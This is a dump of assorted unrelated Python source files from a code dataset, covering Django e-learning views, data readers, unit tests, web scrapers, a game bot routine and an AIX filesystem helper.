ner_ids)\n\n\nclass NERInstance(object):\n def __init__(self, sentence, ner_tags, ner_ids):\n self.sentence = sentence\n self.ner_tags = ner_tags\n self.ner_ids = ner_ids\n\n def length(self):\n return self.sentence.length()\n\n\nclass Sentence(object):\n def __init__(self, words, word_ids, char_seqs, char_id_seqs):\n self.words = words\n self.word_ids = word_ids\n self.char_seqs = char_seqs\n self.char_id_seqs = char_id_seqs\n\n def length(self):\n return len(self.words)\n","sub_path":"examples/sequence_tagging/conll_reader.py","file_name":"conll_reader.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"408343357","text":"from classes.attribdict import AttribDict\n\nEQ_NO_POLICY = 0\nEQ_CASE_INSENSITIVE = 1\nEQ_INTEGER = 2\n\nclass EqualityPolicy(object):\n def __init__(self,policy):\n self.policy = AttribDict(policy)\n\n def of_attribute(self,attname):\n if attname in self.policy.keys():\n return self.policy[attname]\n else:\n if '*' in self.policy.keys():\n return self.policy['*']\n return EQ_NO_POLICY\n return\n\n def compare(self,a,b,attname):\n att_pol = self.of_attribute(attname)\n if att_pol == EQ_NO_POLICY:\n r = self.compare_no_policy(a,b)\n if att_pol == EQ_CASE_INSENSITIVE:\n lc_a = list()\n lc_b = list()\n for v in a:\n lc_a.append(v.lower())\n for v in b:\n lc_b.append(v.lower())\n r = self.compare_no_policy(lc_a,lc_b)\n if att_pol == EQ_INTEGER:\n i_a = list()\n i_b 
= list()\n for v in a:\n i_a.append(int(v))\n for v in b:\n i_b.append(int(v))\n r = self.compare_no_policy(i_a, i_b)\n\n return r\n\n def compare_no_policy(self,a,b):\n r = 1 if a > b else 0 if a == b else -1\n return r","sub_path":"classes/equalitypolicy.py","file_name":"equalitypolicy.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"195593036","text":"def create_fs(module, fs_type, filesystem, vg, device, size, mount_group, auto_mount, account_subsystem, permissions, nfs_server, attributes):\n ' Create LVM file system or NFS remote mount point. '\n attributes = ' -a '.join(attributes)\n account_subsys_opt = {\n True: '-t yes',\n False: '-t no',\n }\n if (nfs_server is not None):\n auto_mount_opt = {\n True: '-A',\n False: '-a',\n }\n else:\n auto_mount_opt = {\n True: '-A yes',\n False: '-A no',\n }\n if (size is None):\n size = ''\n else:\n size = ('-a size=%s' % size)\n if (device is None):\n device = ''\n else:\n device = ('-d %s' % device)\n if (vg is None):\n vg = ''\n else:\n (vg_state, msg) = _validate_vg(module, vg)\n if vg_state:\n vg = ('-g %s' % vg)\n else:\n changed = False\n return (changed, msg)\n if (mount_group is None):\n mount_group = ''\n else:\n mount_group = ('-u %s' % mount_group)\n auto_mount = auto_mount_opt[auto_mount]\n account_subsystem = account_subsys_opt[account_subsystem]\n if (nfs_server is not None):\n mknfsmnt_cmd = module.get_bin_path('mknfsmnt', True)\n if (not module.check_mode):\n (rc, mknfsmnt_out, err) = module.run_command(('%s -f \"%s\" %s -h \"%s\" -t \"%s\" \"%s\" -w \"bg\"' % (mknfsmnt_cmd, filesystem, device, nfs_server, permissions, auto_mount)))\n if (rc != 0):\n module.fail_json(msg='Failed to run mknfsmnt.', rc=rc, err=err)\n else:\n changed = True\n msg = ('NFS file system %s created.' % filesystem)\n return (changed, msg)\n else:\n changed = True\n msg = ''\n return (changed, msg)\n else:\n crfs_cmd = module.get_bin_path('crfs', True)\n if (not module.check_mode):\n (rc, crfs_out, err) = module.run_command(('%s -v %s -m %s %s %s %s %s %s -p %s %s -a %s' % (crfs_cmd, fs_type, filesystem, vg, device, mount_group, auto_mount, account_subsystem, permissions, size, attributes)))\n if (rc == 10):\n module.exit_json(msg=('Using a existent previously defined logical volume, volume group needs to be empty. 
%s' % err))\n elif (rc != 0):\n module.fail_json(msg='Failed to run crfs.', rc=rc, err=err)\n else:\n changed = True\n return (changed, crfs_out)\n else:\n changed = True\n msg = ''\n return (changed, msg)","sub_path":"Data Set/bug-fixing-3/75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_name":"75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"643462963","text":"def main():\n lst = []\n n = int(input())\n for i in range(n):\n l = [input(), float(input())]\n lst.append(l)\n\n grades = {}\n\n for i in lst:\n grades[i[0]] = i[1]\n\n marks = set((grades.values()))\n sorted_marks = sorted(marks)\n\n second_lowest_mark = sorted_marks[1]\n\n final_student_list = []\n\n for i in lst:\n if second_lowest_mark == i[1]: # i[1] represents only marks in list of lists\n final_student_list.append(i[0]) # i[0] represents only names in the list of lists\n\n for i in final_student_list:\n print(i)\n\nif __name__ == '__main__':\n main()","sub_path":"nested_2nd_lowest.py","file_name":"nested_2nd_lowest.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"239003330","text":"import unittest\nimport numpy as np\nfrom Layers.BatchNorm1D import BatchNorm1D\n\n\nclass BatchNormValueTest(unittest.TestCase):\n def test_output_value(self):\n for batch_size in range(2, 10):\n for input_length in range(1, 20):\n beta = np.random.randn(input_length, 1)\n eps = np.random.rand(input_length, 1)\n input_data = np.random.randn(batch_size, input_length, 1)\n test_layer = BatchNorm1D(input_length=input_length, batch_size=batch_size, beta=beta, eps=eps)\n output_data = test_layer.forward(input_data)\n output_mean = np.mean(output_data, axis=0)\n # Check the value of variance\n self.assertTrue(np.allclose(np.var(output_data, axis=0), np.var(input_data, axis=0) / (\n np.var(input_data, axis=0) + test_layer._eps)))\n # Check the mean of the output\n self.assertTrue(np.allclose(output_mean, test_layer._beta))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Layers/unit_test/test_BatchNorm.py","file_name":"test_BatchNorm.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"38772882","text":"from libs.effects.effect import Effect # pylint: disable=E0611, E0401\n\nimport numpy as np\n\n\nclass EffectBubble(Effect):\n def run(self):\n # Get the config of the current effect.\n effect_config = self.get_effect_config(\"effect_bubble\")\n led_count = self._device.device_config[\"led_count\"]\n led_mid = self._device.device_config[\"led_mid\"]\n\n # Translate the true and false to a number, for the function use.\n current_reverse_translated = 0\n if effect_config[\"reverse\"]:\n current_reverse_translated = -1\n else:\n current_reverse_translated = 1\n\n full_bubble_ref = self._color_service.full_bubble\n\n # Build an array with the currently selected gradient.\n # Cut the slide to the led count length.\n output_array = np.array(\n [\n full_bubble_ref[effect_config[\"gradient\"]][0][:led_count],\n full_bubble_ref[effect_config[\"gradient\"]][1][:led_count],\n full_bubble_ref[effect_config[\"gradient\"]][2][:led_count]\n ]\n )\n\n # Calculate how many steps the array will roll.\n steps = self.get_roll_steps(effect_config[\"speed\"])\n\n # We got the current output array. 
Now we prepare the next step. We \"roll\" the array with the specified speed.\n full_bubble_ref[effect_config[\"gradient\"]] = np.roll(\n full_bubble_ref[effect_config[\"gradient\"]],\n steps * current_reverse_translated,\n axis=1\n )\n\n if effect_config[\"mirror\"]:\n output_array = self.mirror_array(output_array, led_mid, led_count)\n\n # Add the output array to the queue.\n self.queue_output_array_blocking(output_array)\n","sub_path":"server/libs/effects/effect_bubble.py","file_name":"effect_bubble.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"180493581","text":"\"\"\"\ncount up the total number of events in a set of TFRecord files\n\"\"\"\nfrom __future__ import print_function\nfrom six.moves import range\nimport tensorflow as tf\nimport logging\n\nimport mnvtf.utils as utils\n\nLOGGER = logging.getLogger(__name__)\nFLAGS = tf.app.flags.FLAGS\n\n\ntf.app.flags.DEFINE_string('data_dir', '/tmp/data',\n \"\"\"Directory where data is stored.\"\"\")\ntf.app.flags.DEFINE_string('file_root', 'mnv_data_',\n \"\"\"File basename.\"\"\")\ntf.app.flags.DEFINE_string('compression', '',\n \"\"\"pigz (zz) or gzip (gz).\"\"\")\ntf.app.flags.DEFINE_string('data_format', 'NHWC',\n \"\"\"Tensor packing structure.\"\"\")\ntf.app.flags.DEFINE_string('log_name', 'temp_log.txt',\n \"\"\"Logfile name.\"\"\")\ntf.app.flags.DEFINE_string('out_pattern', 'temp_out',\n \"\"\"Logfile name.\"\"\")\ntf.app.flags.DEFINE_string('tfrec_type', 'hadmultkineimgs',\n \"\"\"TFRecord file type.\"\"\")\ntf.app.flags.DEFINE_string('field', 'eventids',\n \"\"\"Recorded data field.\"\"\")\ntf.app.flags.DEFINE_integer('batch_size', 128,\n \"\"\"Batch size.\"\"\")\ntf.app.flags.DEFINE_integer('imgh', 127,\n \"\"\"Img height.\"\"\")\ntf.app.flags.DEFINE_integer('imgw_x', 50,\n \"\"\"X-view img width.\"\"\")\ntf.app.flags.DEFINE_integer('imgw_uv', 25,\n \"\"\"U/V-view img width.\"\"\")\ntf.app.flags.DEFINE_integer('img_depth', 2,\n \"\"\"Img depth.\"\"\")\ntf.app.flags.DEFINE_integer('n_planecodes', 67,\n \"\"\"Number of planecodes.\"\"\")\n\n\ndef read_all_field(datareader_dict, typ, tfrec_type, field):\n LOGGER.info('read all {} for {}...'.format(field, typ))\n out_file = FLAGS.out_pattern + typ + '_' + field + '.txt'\n tf.reset_default_graph()\n n_evt = 0\n\n with tf.Graph().as_default() as g:\n with tf.Session(graph=g) as sess:\n\n reader_class = utils.get_reader_class(tfrec_type)\n reader = reader_class(datareader_dict)\n # get an ordered dict\n X, U, V, eventids, targets = reader.batch_generator(num_epochs=1)\n\n sess.run(tf.local_variables_initializer())\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n try:\n with open(out_file, 'ab+') as f:\n for batch_num in range(1000000):\n vs = sess.run(eventids)\n n_evt += len(vs)\n for v in vs:\n f.write('{}\\n'.format(v))\n except tf.errors.OutOfRangeError:\n LOGGER.info('Reading stopped - queue is empty.')\n except Exception as e:\n LOGGER.info(e)\n finally:\n coord.request_stop()\n coord.join(threads)\n\n LOGGER.info('found {} {} events'.format(n_evt, typ))\n utils.gz_compress(out_file)\n\n return n_evt\n\n\ndef main(argv=None):\n logfilename = FLAGS.log_name\n logging.basicConfig(\n filename=logfilename, level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n LOGGER.info(\"Starting...\")\n LOGGER.info(__file__)\n\n runpars_dict = utils.make_run_params_dict()\n train_list, valid_list, test_list = \\\n 
utils.get_trainvalidtest_file_lists(\n            FLAGS.data_dir, FLAGS.file_root, FLAGS.compression\n        )\n    flist_dict = {}\n    read_types_list = []\n    if len(train_list) > 0:\n        flist_dict['train'] = train_list\n        read_types_list.append('train')\n    if len(valid_list) > 0:\n        flist_dict['valid'] = valid_list\n        read_types_list.append('valid')\n    if len(test_list) > 0:\n        flist_dict['test'] = test_list\n        read_types_list.append('test')\n\n    def datareader_dict(filenames_list, name):\n        img_shp = (FLAGS.imgh, FLAGS.imgw_x, FLAGS.imgw_uv, FLAGS.img_depth)\n        dd = utils.make_data_reader_dict(\n            filenames_list=filenames_list,\n            batch_size=FLAGS.batch_size,\n            name=name,\n            compression=FLAGS.compression,\n            img_shp=img_shp,\n            data_format=FLAGS.data_format,\n            n_planecodes=FLAGS.n_planecodes\n        )\n        return dd\n\n    LOGGER.debug(' run_params_dict = {}'.format(repr(runpars_dict)))\n\n    n_total = 0\n    for typ in read_types_list:\n        dd = datareader_dict(flist_dict[typ], typ)\n        LOGGER.info(' data reader dict for {} = {}'.format(\n            typ, repr(dd)\n        ))\n        n_total += read_all_field(dd, typ, FLAGS.tfrec_type, FLAGS.field)\n\n    LOGGER.info('Total events = {}'.format(n_total))\n\n\nif __name__ == '__main__':\n    tf.app.run()\n","sub_path":"tfrec_examiner_dset.py","file_name":"tfrec_examiner_dset.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"454664020","text":"import sys\nimport os\n\nscriptDir = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.join(scriptDir, \"..\", \"dspy\"))\nimport process_dsp_data\n\nif __name__ == \"__main__\":\n    import argparse\n\n    parser = argparse.ArgumentParser(description=\"Process all DSP data.\")\n    parser.add_argument(\"-i\", \"--indir\", help=\"Data directory for input\", required=True)\n    parser.add_argument(\n        \"-o\", \"--outdir\", help=\"Output directory to save results\", required=True\n    )\n    parser.add_argument(\n        \"-r\", \"--rerun\", help=\"Perform validation\", required=False, action=\"store_true\"\n    )\n    parser.add_argument(\n        \"-s\",\n        \"--scriptdir\",\n        help=\"Directory where the scripts are for this\",\n        required=False,\n    )\n\n    parser.add_argument(\n        \"-p\",\n        \"--skippdfs\",\n        help=\"Whether to skip PDFs generation\",\n        required=False,\n        action=\"store_true\",\n    )\n\n    parser.set_defaults(scriptdir=scriptDir, rerun=False, skippdfs=False)\n\n    args = vars(parser.parse_args())\n\n    if args[\"skippdfs\"]:\n        all_pdfs = False\n    else:\n        all_pdfs = True\n\n    process_dsp_data.process_dsp_data(\n        args[\"indir\"],\n        args[\"outdir\"],\n        args[\"rerun\"],\n        args[\"scriptdir\"],\n        all_pdfs,\n    )\n","sub_path":"dspy/run_dspy.py","file_name":"run_dspy.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"160541879","text":"#!/usr/bin/python3\n\"\"\"\nDefine function that writes an Object to a text file, using a JSON\nrepresentation.\n\"\"\"\nimport json\n\n\ndef save_to_json_file(my_obj, filename):\n    \"\"\"\n    writes an Object to a text file, using a JSON representation.\n\n    Args:\n        my_obj(object): Python object to serialize.\n        filename(str): File name to write the serialized object.\n    Return:\n        Nothing.\n    \"\"\"\n    if filename:\n        with open(filename, mode='w', encoding='utf-8') as data:\n            
data.write(json.dumps(my_obj))\n","sub_path":"0x0B-python-input_output/7-save_to_json_file.py","file_name":"7-save_to_json_file.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"234815234","text":"from django.shortcuts import render, redirect, get_object_or_404, render_to_response\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import SignupForm\nfrom django.contrib.auth import logout\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User\nimport hashlib, datetime, random\nimport hashlib\nimport json\nfrom .models import UserActivationKey, Course, CoursePart, QuizPart, CourseTaken, QuizTaken, QuizPartAnswer, UserProfile\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib import messages\nfrom .gmail import send_mail_gmail\n\n# Create your views here.\ndef home_view(request):\n return render(request, \"loglan/home.html\")\n\ndef about_view(request):\n return render(request, \"loglan/about.html\")\n\ndef help_view(request):\n return render(request, \"loglan/help.html\")\n\ndef signup_view(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n\n username = form.cleaned_data['username']\n email = form.cleaned_data['email']\n\n activation_key = hashlib.sha224((email).encode('utf-16be')).hexdigest()\n key_expires = datetime.datetime.today() + datetime.timedelta(2)\n\n user=User.objects.get(username=username)\n user_activation_key = UserActivationKey(user=user, activation_key=activation_key, key_expires=key_expires)\n user_activation_key.save()\n\n user_profile = UserProfile(user=user)\n user_profile.save()\n\n host=request.META['HTTP_HOST']\n email_subject = 'Account confirmation'\n email_body = \"\"\"Hai {}, Terimakasih sudah mendaftar.\n\nSelamat datang di LogLan, web aplikasi e-learning berbasis metode gamification untuk belajar bahasa pemrograman Python yang menyenangkan dan menantang. 
Aplikasi ini dibuat untuk tujuan penelitian.\n\nUntuk aktifasi akun, silahkan kunjungi tautan dibawah ini dalam jangka waktu kurang dari 48 jam.\n\nhttp://{}/account/confirmation/{}\n\nJika mengklik tautan di atas tidak berhasil, silakan salin dan tempel URL di jendela browser baru.\n\n\nHormat Saya,\nMuhammad Nizar Yoga Pratama\"\"\".format(username, host, activation_key)\n\n from_email = settings.EMAIL_HOST_USER\n to_email = [user.email, settings.EMAIL_HOST_USER]\n\n send_mail(email_subject, email_body, from_email, to_email, fail_silently=False)\n # send_mail_gmail(email_subject, email_body, from_email, user.email)\n\n # return HttpResponseRedirect('/sign-up/succes')\n return render_to_response('loglan/signup_succes.html')\n\n else:\n form = SignupForm()\n\n return render(request, 'loglan/signup.html', {'form': form})\n\ndef account_confirmation_view(request, activation_key):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/user-main-page')\n\n user_activation = get_object_or_404(UserActivationKey, activation_key=activation_key)\n if user_activation.key_expires < timezone.now():\n return render_to_response('loglan/account_expired.html')\n user = user_activation.user\n user.is_active = True\n user.save()\n return render_to_response('loglan/account_confirmed.html')\n\n# def account_confirmed_view():\n# return render(request, \"loglan/account_confirmed.html\")\n#\n# def account_expired_view():\n# return render(request, \"loglan/account_expired.html\")\n#\n# def signup_succes_view(request):\n# return render(request, \"loglan/signup_succes.html\")\n\n@login_required\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/login')\n\ndef ranking_view(request):\n context = {}\n user_profiles = UserProfile.objects.all()\n user_rankings = UserProfile.user_profile_manager.get_user_rangking()\n context['user_rankings'] = user_rankings\n return render(request, \"loglan/ranking.html\", context)\n\ndef user_main_page_view(request):\n context = {}\n course_taken = CourseTaken.objects.filter(user=request.user)\n context['course_taken']=course_taken\n return render(request, \"loglan/user_main_page.html\", context)\n\n\ndef choose_level_view(request):\n context = {}\n courses = Course.objects.all()\n context['courses']=courses\n return render(request, \"loglan/choose_level.html\", context )\n\n\ndef quiz_part_detail_view(request, course_slug, number_part_quiz):\n quiz_part = QuizPart.objects.get(number=number_part_quiz, quiz__course__course_slug = course_slug)\n\n quiz_taken, created = QuizTaken.objects.get_or_create(\n user=request.user,\n quiz=quiz_part.quiz\n )\n try:\n if number_part_quiz != '1' and (quiz_part.previous_quiz() != quiz_taken.last_taken_quiz()):\n if quiz_taken.last_taken_quiz():\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, quiz_taken.last_taken_quiz().next_quiz().number))\n else:\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, 1))\n else:\n if quiz_part in quiz_taken.quiz_part_is_completed.all():\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, quiz_taken.last_taken_quiz().next_quiz().number))\n except:\n return HttpResponseRedirect('/quiz/{}/result'.format(course_slug))\n\n\n # kalau nomor quiz 1, quiz_part_is_true sama false harus dikosongin\n # if number_part_quiz == 1:\n\n if request.method == \"POST\":\n jawaban_id = int(request.POST.get(\"ChoiceAnswer\"))\n jawaban = QuizPartAnswer.objects.get(id=jawaban_id)\n print(jawaban_id)\n if quiz_part.quiz_answer_key.id == jawaban_id:\n 
quiz_taken.quiz_part_is_true.add(quiz_part)\n        else:\n            quiz_taken.quiz_part_is_false.add(quiz_part)\n        quiz_taken.quiz_part_is_completed.add(quiz_part)\n        if quiz_part.is_last_quiz_part():\n            return HttpResponseRedirect('/quiz/{}/result'.format(course_slug))\n        else:\n            return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, quiz_part.next_quiz().number))\n\n    context = {}\n    context['quiz_part'] = quiz_part\n    return render(request, \"loglan/quiz_part_detail.html\", context)\n\ndef quiz_part_result_view(request, course_slug):\n    quiz_taken, created = QuizTaken.objects.get_or_create(\n        user=request.user,\n        quiz__course__course_slug=course_slug\n    )\n    context = {'quiz_taken': quiz_taken}\n    return render(request, \"loglan/quiz_part_result.html\", context )\n\ndef quiz_part_retake_view(request, course_slug):\n    # context = {}\n    # context [''] =\n    quiz_taken, created = QuizTaken.objects.get_or_create(\n        user=request.user,\n        quiz__course__course_slug=course_slug\n    )\n    quiz_taken.quiz_part_is_true.clear()\n    quiz_taken.quiz_part_is_false.clear()\n    quiz_taken.quiz_part_is_completed.clear()\n\n    return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, 1))\n\n\ndef course_part_detail_view(request, course_slug, number_part_course):\n    course = Course.objects.get(course_slug=course_slug)\n    course_part = CoursePart.objects.get(number=number_part_course, course=course)\n\n    # check whether this course has already been taken\n    course_taken, created = CourseTaken.objects.get_or_create(\n        user=request.user,\n        course=course_part.course\n    )\n\n    if number_part_course != '1' and (course_part.previous_part() not in course_taken.course_part.all()):\n        if course_taken.last_taken_part():\n            return HttpResponseRedirect('/course/{}/{}/'.format(course_slug, course_taken.last_taken_part().next_part().number))\n        else:\n            return HttpResponseRedirect('/course/{}/{}/'.format(course_slug, 1))\n\n    context = {}\n    context['course_part'] = course_part\n    return render(request, \"loglan/course_part_detail.html\", context )\n\ndef course_part_list_view(request, course_slug):\n    context = {}\n    course = Course.objects.get(course_slug=course_slug)\n    # check whether this course has already been taken\n    course_taken, created = CourseTaken.objects.get_or_create(\n        user=request.user,\n        course=course\n    )\n\n    if created:\n        course_taken.course_part.add(course.course_parts.all()[0])\n\n    context['course'] = course\n    context['course_taken'] = course_taken\n    return render(request, \"loglan/course_part_list.html\", context)\n\ndef course_part_result_view(request, course_slug):\n    context = {}\n    course = Course.objects.get(course_slug=course_slug)\n    context['course'] = course\n    return render(request, \"loglan/course_part_result.html\", context)\n\ndef cek_jawaban(request):\n    if request.method == 'POST':\n        kode_jawaban = request.POST.get('jawaban')\n        console_user = request.POST.get('console_user')\n        user_id = request.POST.get('user_id')\n        course_part_id = request.POST.get('course_part_id')\n        response_data = {}\n        user = User.objects.get(id=int(user_id))\n        soal = CoursePart.objects.get(id=int(course_part_id))\n\n        print('soal.id', soal.id)\n        print('soal.course_example_answer_key: ', soal.course_example_answer_key)\n        kunci = soal.course_example_answer_key.replace(u'\\r',u'')\n        kunci =u'{}\\n'.format(kunci)\n\n        print('kode_jawaban: ', kode_jawaban)\n        print('kunci: ', kunci)\n        if kunci == kode_jawaban:\n            hasil_jawaban = \"Kode program Anda benar\"\n            course_taken = CourseTaken.objects.get(user=request.user, course=soal.course)\n            
course_taken.course_part.add(soal)\n if soal.is_last_course_part():\n course_taken.is_done = True\n course_taken.save()\n\n else:\n hasil_jawaban = \"Kode program Anda salah\"\n\n response_data['hasil_jawaban'] = hasil_jawaban\n response_data['jawaban_html'] = kode_jawaban\n print(response_data)\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n else:\n return HttpResponse(json.dumps({\"nothing to see\": \"this isn't happening\"}), content_type=\"application/json\")\n","sub_path":"loglan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"595932999","text":"import melee\nimport globals\nfrom melee.enums import Action, Button\nfrom enum import Enum\n\nclass SMASH_DIRECTION(Enum):\n UP = 0\n DOWN = 1\n FORWARD = 2\n\nclass SmashAttack():\n def __init__(self, charge=0, direction=SMASH_DIRECTION.UP):\n self.charge = charge\n self.direction = direction\n self.frames_charged = 0\n\n def step(self):\n smashbot_state = globals.smashbot_state\n controller = globals.controller\n\n if smashbot_state.action == Action.LANDING_SPECIAL:\n self.interruptible = True\n controller.empty_input()\n return\n\n # Do we need to jump cancel?\n jumpcancelactions = [Action.SHIELD, Action.SHIELD_RELEASE, Action.DASHING, Action.RUNNING]\n if smashbot_state.action in jumpcancelactions:\n self.interruptible = False\n controller.press_button(Button.BUTTON_Y);\n return\n\n if smashbot_state.action in [Action.FSMASH_MID, Action.UPSMASH, Action.DOWNSMASH]:\n # Are we in the early stages of the smash and need to charge?\n if self.frames_charged < self.charge:\n self.interruptible = False\n self.frames_charged += 1\n controller.press_button(Button.BUTTON_A);\n return\n # Are we done with a smash and just need to quit?\n else:\n self.interruptible = True\n controller.empty_input()\n return\n\n # Do the smash, unless we were already pressing A\n if controller.prev.button[Button.BUTTON_A]:\n controller.empty_input()\n self.interruptible = True\n return\n\n self.interruptible = False\n controller.press_button(Button.BUTTON_A);\n if self.direction == SMASH_DIRECTION.UP:\n controller.tilt_analog(Button.BUTTON_MAIN, .5, 1)\n elif self.direction == SMASH_DIRECTION.DOWN:\n controller.tilt_analog(Button.BUTTON_MAIN, .5, 0)\n elif self.direction == SMASH_DIRECTION.FORWARD:\n controller.tilt_analog(Button.BUTTON_MAIN, int(smashbot_state.facing), .5)\n","sub_path":"Chains/smashattack.py","file_name":"smashattack.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"253848736","text":"import pymongo\nimport requests\nimport json\nfrom lxml.html import fromstring\nfrom bs4 import BeautifulSoup as bs\nfrom itertools import cycle\nimport traceback\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb = myclient[\"archimaterie\"]\nmycol = mydb[\"active\"]\n\ndef getproxies():\n url = 'https://free-proxy-list.net/'\n response = requests.get(url)\n parser = fromstring(response.text)\n proxies = set()\n for i in parser.xpath('//tbody/tr')[:1000]:\n if i.xpath('.//td[7][contains(text(),\"yes\")]'):\n # Grabbing IP and corresponding PORT\n proxy = \":\".join([i.xpath('.//td[1]/text()')[0],\n i.xpath('.//td[2]/text()')[0]])\n proxies.add(proxy)\n return proxies\n\nproxies = getproxies()\n\n\ndef genurl(company):\n return \"https://www.startpage.com/do/dsearch?query=\" + 
company\n\ndef soupmaker(url):\n    s = requests.get(url)\n    return bs(s.text, features=\"lxml\")\n\ndef alllinks(soup):\n    links = {}\n    anon = {}\n    i = 0\n    j = 0\n    for link in soup.find_all('a'):\n        if \"proxy\" in link.get('href'):\n            anon[\"link%d\" % i] = \"\\\"\" + str(link.get('href')) + \"\\\"\"\n            j += 1\n        else:\n            i += 1\n            if i > 14:\n                links[\"link%d\" % i] = \"\\\"\" + str(link.get('href')) + \"\\\"\"\n    # hand back both dicts as a pair so callers can index the result\n    return links, anon\n\ndef updatedoc(doc, links):\n    var = json.dumps(links, indent=4)\n    linksjson = json.loads(var)\n    mycol.update_one(doc, {\"$push\": linksjson })\n\n\ndef main():\n    for doc in mycol.find():\n        updatedoc(doc, alllinks(soupmaker(genurl(str(doc['name']))))[0])\n","sub_path":"refactor.py","file_name":"refactor.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"251522428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 20 14:24:16 2019\n\n@author: bangde\n\"\"\"\n\n# budejie.com joke spider, multithreaded\n# xpath expression: //div[@class=\"j-r-list-c-desc\"]/a/text()\nimport requests\nfrom lxml import etree\nfrom queue import Queue\nimport threading\nimport time\n\nclass bsSpider:\n    def __init__(self):\n        self.baseurl = \"http://www.budejie.com/\"\n        self.headers = {\"User-Agent\":\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)\"}\n        # URL queue\n        self.urlQueue = Queue()\n        # response-html queue\n        self.resQueue = Queue()\n\n    # build the URL queue\n    def getUrl(self):\n        for pNum in range(1,11):\n            url = self.baseurl + str(pNum)\n            self.urlQueue.put(url)\n\n    # send requests, collect the response html, put it on the parse queue\n    def getHtml(self):\n        while True:\n            # 1. get a url from the url queue\n            url = self.urlQueue.get()\n            # 2. send the request and put the response on the response queue\n            res = requests.get(url,headers=self.headers)\n            res.encoding=\"utf-8\"\n            html=res.text\n            # put on the response queue\n            self.resQueue.put(html)\n            # mark this task done\n            self.urlQueue.task_done()\n\n    # page-parsing method\n    def getText(self):\n        while True:\n            html = self.resQueue.get()\n            parseHtml = etree.HTML(html)\n            r_list=parseHtml.xpath('//div[@class=\"j-r-list-c-desc\"]/a/text()')\n            for r in r_list:\n                print(r+\"\\n\")\n            # mark task done\n            self.resQueue.task_done()\n\n    def run(self):\n        # empty list to hold all threads\n        thlist = []\n        # build the URL queue\n        self.getUrl()\n        # create request threads and add them to the list\n        for i in range(3):\n            thRes = threading.Thread(target=self.getHtml)\n            thlist.append(thRes)\n\n        # create parse threads and add them to the list\n        for i in range(3):\n            thparse = threading.Thread(target=self.getText)\n            thlist.append(thparse)\n\n        # start all threads\n        for th in thlist:\n            th.setDaemon(True)\n            th.start()\n\n        # block until both queues are empty, then continue\n        self.urlQueue.join()\n        self.resQueue.join()\n\nif __name__==\"__main__\":\n    begin = time.time()\n    spider = bsSpider()\n    spider.run()\n    end = time.time()\n    print(end-begin)\n","sub_path":"linux/language/python/code/spider/spider26_thread.py","file_name":"spider26_thread.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"614642957","text":"# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
